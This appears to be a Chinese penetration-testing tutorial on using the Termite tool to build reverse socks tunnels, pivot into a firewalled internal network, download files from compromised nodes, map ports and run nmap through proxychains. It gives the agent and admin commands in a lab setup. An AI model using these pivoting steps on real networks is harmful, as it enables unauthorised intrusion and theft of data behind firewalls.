Termite

简介: -l 指定本地socks端口,等待远程连-c 指定远程socks机器ip-p 指定远程socks机器端口适用端口转发的网络环境有以下几种:1. 服务器处于内网,可以访问外部网络。

-l 指定本地socks端口,等待远程连

-c 指定远程socks机器ip

-p 指定远程socks机器端口


适用端口转发的网络环境有以下几种:

1. 服务器处于内网,可以访问外部网络。

2. 服务器处于外网,可以访问外部网络,但是服务器安装了防火墙来拒绝敏感端口的连接。

3. 服务器处于内网,对外只开放了80端口,并且服务器不能访问外网网络。


测试环境:

win10(10.22.XX.XX),ubuntu(192.168.XX.XX),ubuntu1(192.168.XX.XXX)

在termite目录下使用此命令,在ubuntu机器上执行如下语句,语句成功执行后会返回一个id号,主要用来标识当前是哪一个agent,后期我们可以很方便的通过这个id号,灵活切换agent,本地的这个端口其实就是socks代理端口,也就是说,实战中我们可以把目标内网中的所有机器都弹到这一台指定的机器上

./agent_Linux64 -l 8989

在目标win机器上执行,下面的意思,说的通俗点其实就是建立反向socks

A对C的请求,B作为代理,代替A去访问C,并将结果返回给A,则B是正向代理

B主动与A的8888端口建立连接,并将A:8888的访问转为对C:80的访问,结果返回给A,则B是反向代理

反向代理的好处:当AB之间有防火墙,不允许A连B,但是允许B连A

agent_Win32.exe -c  192.168.XX.XX -p 8989

在ubuntu上admin端连接ubuntu01机器上刚刚监听的端口,连接成功后会自动进入termite的内置终端,在终端中执行'help'即可看到所有选项用途,'show'一下就可清晰地看到当前agent的分布

./admin_Linux64 -c 192.168.XX.XX -p 8989

去不同的节点,可以下载文件什么的

>>>goto    2

>>>downfile G:\python2.7\photo.py photo.py



利用Termite把b与a的端口映射

>>>>lcxtran 8989(ubuntu 端口) 172.16.18.1(ubuntu01 ip) 6565(ubuntu 端口)

利用proxychains进行转发

安装proxychains

$sudo apt-get install proxychains

修改proxychains文件

$ vim /etc/proxychains.conf

#defaults set to "tor"

#socks4    127.0.0.1 9050

socks5    127.0.0.1 8989

proxychains与nmap联合使用

proxychains nmap  10.22.XX.XX

目录
相关文章
|
10月前
|
开发框架 安全 .NET
Dedecms打点入内网
Dedecms打点入内网
|
SQL 安全 数据库
XSS平台搭建及利用
XSS平台搭建及利用
1250 0
XSS平台搭建及利用
|
9月前
|
安全
记一次宏病毒分析
记一次宏病毒分析
167 0
|
10月前
|
Go API C语言
UUID结合回调函数免杀初探
UUID结合回调函数免杀初探
210 0
|
网络协议 网络安全 网络架构
SOCKS5协议
SOCKS5协议
152 0
|
安全 Linux 开发工具
总结,复习,整合命令执行漏洞实现及其绕过(绕过方式大全)
>🍀1复习一下以前的内容 >🍀2总结整合一下过滤方法
156 0
总结,复习,整合命令执行漏洞实现及其绕过(绕过方式大全)
|
Java 开发工具 Android开发
Android Sdk和安卓各个版本的匹配
Android Sdk和安卓各个版本的匹配
235 0
|
分布式计算 监控 Hadoop
|
Linux Go Windows
go windows编译linux可执行文件
go windows编译linux可执行文件
5793 0